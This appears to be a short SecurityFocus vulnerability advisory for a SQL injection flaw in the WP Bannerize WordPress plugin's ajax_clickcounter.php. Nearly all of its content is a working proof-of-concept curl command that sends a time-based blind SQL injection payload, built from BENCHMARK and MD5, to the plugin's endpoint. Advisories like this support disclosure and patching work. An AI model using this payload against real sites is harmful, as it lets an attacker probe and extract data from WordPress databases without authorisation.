WordPress WP Bannerize 'ajax_clickcounter.php' SQL Injection Vulnerability

The following example data is available:

curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.example.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php


 

Privacy Statement
Copyright 2010, SecurityFocus